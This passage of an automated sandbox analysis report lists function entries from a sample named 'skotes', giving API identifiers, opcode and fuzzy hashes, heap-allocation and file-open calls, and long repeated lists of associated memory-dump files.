                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$LocalSpecificSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2574697306-0
                                                                                                                                                                                                                                              • Opcode ID: cfa7f130e1a3bddf12619ebecf6650c9cfd997b52a6057d44367c9200a460592
                                                                                                                                                                                                                                              • Instruction ID: 1640579be05d2f272a735fe2df26b2375397120b5dcc61aea84461ecb58bd6bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfa7f130e1a3bddf12619ebecf6650c9cfd997b52a6057d44367c9200a460592
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F11187290410DABDF14DE95C885EDFB7BDAF08310F209262E51AE20C0EB70EB09CB61
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                                                                                              • Opcode ID: 861ab313bef5de09ca3dfbce62460087d59c4bf1f5bc78d7c910c7cddfa7f0f6
                                                                                                                                                                                                                                              • Instruction ID: eb72b2b08e60e0675b36722bf25e8c373f51bf7a86a38169569f30502bd3ce35
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 861ab313bef5de09ca3dfbce62460087d59c4bf1f5bc78d7c910c7cddfa7f0f6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE111571A0420AAFCF05DF58E941ADF7BF4EF48304F054069F809AB251D631EE21DB65
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C0A813,00000001,00000364,00000006,000000FF,?,00BED3FC,845AEA34,?,00BE7A8B,?), ref: 00C0D870
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 5011da67c3aed33a3371c19f893b3676938b39599f9d43126a84cca7974e81d2
                                                                                                                                                                                                                                              • Instruction ID: 1f28cd3c575c6f2552635745c43622915c0e8e6abfe311b5704bdbe849ee320e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5011da67c3aed33a3371c19f893b3676938b39599f9d43126a84cca7974e81d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BF0273264522466EB212AF39C01B5B3799DF817B0B29C321FC2AA71D1DA30EE00D6E0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,845AEA34,?,?,00BED3FC,845AEA34,?,00BE7A8B,?,?,?,?,?,?,00BD7465,?), ref: 00C0B07D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 46b412eaa85ff46fd2368cfd1db9b444f2055ad649d108331fa08ec8d3540c30
                                                                                                                                                                                                                                              • Instruction ID: 19c0c6e28c53aeff537fb8178afa56ef930683b729a6009579b3e6d7005c55c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46b412eaa85ff46fd2368cfd1db9b444f2055ad649d108331fa08ec8d3540c30
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DE09BB5585226A6E73172759C00B6F76499F423B4F151211EDB4961D1DF11DE00D1E1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,00C11B65,?,?,00000000,?,00C11B65,00000000,0000000C), ref: 00C11792
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
